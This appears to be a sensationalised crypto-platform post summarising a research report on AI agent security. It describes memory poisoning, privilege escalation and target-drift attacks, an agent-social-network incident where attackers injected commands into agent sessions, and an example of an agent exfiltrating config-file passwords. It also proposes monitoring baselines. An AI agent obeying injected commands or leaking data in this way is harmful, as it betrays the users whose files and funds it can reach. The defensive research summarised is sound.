Futures
Access hundreds of perpetual contracts
CFD
Gold
One platform for global traditional assets
Options
Hot
Trade European-style vanilla options
Unified Account
Maximize your capital efficiency
Demo Trading
Introduction to Futures Trading
Learn the basics of futures trading
Futures Events
Join events to earn rewards
Demo Trading
Use virtual funds to practice risk-free trading
Launch
CandyDrop
Collect candies to earn airdrops
Launchpool
Quick staking, earn potential new tokens
HODLer Airdrop
Hold GT and get massive airdrops for free
Pre-IPOs
Unlock full access to global stock IPOs
Alpha Points
Trade on-chain assets and earn airdrops
Futures Points
Earn futures points and claim airdrop rewards
Promotions
AI
Gate AI
Your all-in-one conversational AI partner
Gate AI Bot
Use Gate AI directly in your social App
GateClaw
Gate Blue Lobster, ready to go
Gate for AI Agent
AI infrastructure, Gate MCP, Skills, and CLI
Gate Skills Hub
10K+ Skills
From office tasks to trading, the all-in-one skill hub makes AI even more useful.
GateRouter
Smartly choose from 40+ AI models, with 0% extra fees
Devastating proof! 91% of AI Agents are full of vulnerabilities, 770k Agents are hacked simultaneously—Is the $BTC in your hands still safe?
Bro, sit tight. Today I won’t talk about anything else, just about a matter directly linked to your wallet—your AI Agent, those “digital assistants” that help you trade, manage emails, and even automatically farm airdrops—might be working for hackers.
A joint research report from top institutions like Stanford, MIT, Carnegie Mellon, and NVIDIA just landed on the table, with data so cold it cuts to the bone: they examined 847 AI Agents running in production environments and found that 91% have toolchain attack vulnerabilities, and 94% of memory-enhanced Agents can be “poisoned”—like pouring laundry detergent into your drinking water while still happily drinking it.
Even more terrifying, the study uncovered 2,347 previously unknown vulnerabilities, 23% of which are rated as severe. This is no longer just a lab simulation. The first author of the paper, Owen Sakawa, directly referenced a real case from earlier this year—the OpenClaw/Moltbook incident.
Come, let me tell you about this “textbook-level” black swan. OpenClaw is an open-source AI Agent, released in November 2025, capable of sending emails, managing schedules, executing terminal commands, deploying code, and even maintaining memory across sessions. It has 160k stars on GitHub—hugely popular.
Then someone built a social platform called Moltbook, specifically for OpenClaw’s Agents. After viral spread, over 770k Agents registered on it—how? Users told their Agents: “Hey, register an account on Moltbook,” and the Agents went and filled out the forms themselves.
What happened next? The platform’s database had a vulnerability—hackers could bypass authentication and inject commands directly into any Agent session. 770k Agents, each with privileged access to user devices, emails, and files, all compromised.
Security firm Astrix Security used their proprietary tool ClawdHunter to scan and found 42,665 OpenClaw instances on the public internet, with 8 completely open and unprotected—no authentication at all. Cisco’s AI security research team commented: “From a capability perspective, groundbreaking; from a security standpoint, an absolute nightmare.”
Kaspersky’s January 2026 audit identified 512 vulnerabilities, 8 of which are severe. Security researcher Simon Willison summarized the “fatal triangle”—AI Agents can access private data, encounter untrusted content, and communicate externally. When all three sides connect, the hacker’s ideal springboard is formed.
The research team distinguished the security issues of AI Agents from those of general large language models: evaluating LLMs asks, “Can the model produce unsafe content?” while evaluating Agents asks, “Can the model do unsafe things”—which involves tool invocation, state modification, and multi-step plan execution.
For example, an Agent with permissions to read files and send HTTP requests. Each step alone is compliant: reading files isn’t illegal, sending requests isn’t illegal. But combined, they can steal passwords from configuration files and send them to an attacker’s server—an operation that’s compliant but results in data theft. This is called a “compositional security problem.”
Controlled testing is even more chilling: privilege escalation attacks on tool-using Agents succeed 95% of the time, and poisoning attacks on memory-enhanced Agents succeed 94%. Even the most robust multi-agent systems face a 58% success rate against target drift attacks.
In reinforcement learning-based attack generation tests, the violation rate was 79%, a 25.4% increase over manually designed attacks at 63%. This shows hackers’ weaponry is rapidly expanding, and human red teams can’t keep up.
The study broke down vulnerabilities by industry: 289 deployments in healthcare (34.1%), 247 in finance (29.2%), 198 in customer service (23.4%), 113 in code generation (13.3%). Among six attack maps, state manipulation led with 612 instances, target drift followed with 573. Tool misuse and chain calls, though third in total (489), are the most severe—198 rated as severe, the highest proportion among all categories.
And here’s a detail that might keep you awake: the average time for memory poisoning effects to manifest after injection is 3.7 sessions. By the time you notice something’s wrong, hackers might have already used your Agent to do dirty work for two weeks.
The researchers proposed a minimum security baseline: enforce runtime monitoring on all production Agents; require manual approval for toolchain operations involving data access and external communication; trigger manual review every 20-25 steps; encrypt and verify the integrity of persistent states in memory-enhanced Agents.
In terms of monitoring effectiveness, action-level monitoring has a precision of 0.94, sequence-level monitoring an F1 score of 0.85, and state-level monitoring an F1 score of 0.83. During a 30-day test of 127 production Agents, the system intercepted 4,782 operations, with a false positive rate of 3.7%, and 14.6% of flagged operations were confirmed as real attacks.
Note that most current so-called “AI governance” frameworks are post-hoc audits rather than real-time constraints during execution. The EU Artificial Intelligence Act and the US NIST AI Risk Management Framework are still in progress—compliance pressure and security risks are both exploding.
Back to your wallet. If you’re using AI Agents for automated trading, copying, or managing your wallet, you’d better stop immediately and check: does your Agent store your private keys? read your transaction history? have permissions to send data externally?
Gary Marcus bluntly said: “Autonomous agents are a complete mess.” This isn’t a joke; it’s a conclusion backed by data.
Data doesn’t lie. 847 deployments, 2,347 vulnerabilities, 770k compromised Agents—this isn’t a drill. Your $BTC and $ETH stored in stateless cold wallets are safe for now, but as long as your AI Agent interacts with the network, it’s the thinnest piece of glass in your assets.
Think for yourself.
Follow me for more real-time analysis and insights into the crypto market! $BTC $ETH $SOL
#Gate广场五月交易分享 #Bitcoin holds steady above 80k #CryptoMarketRecovery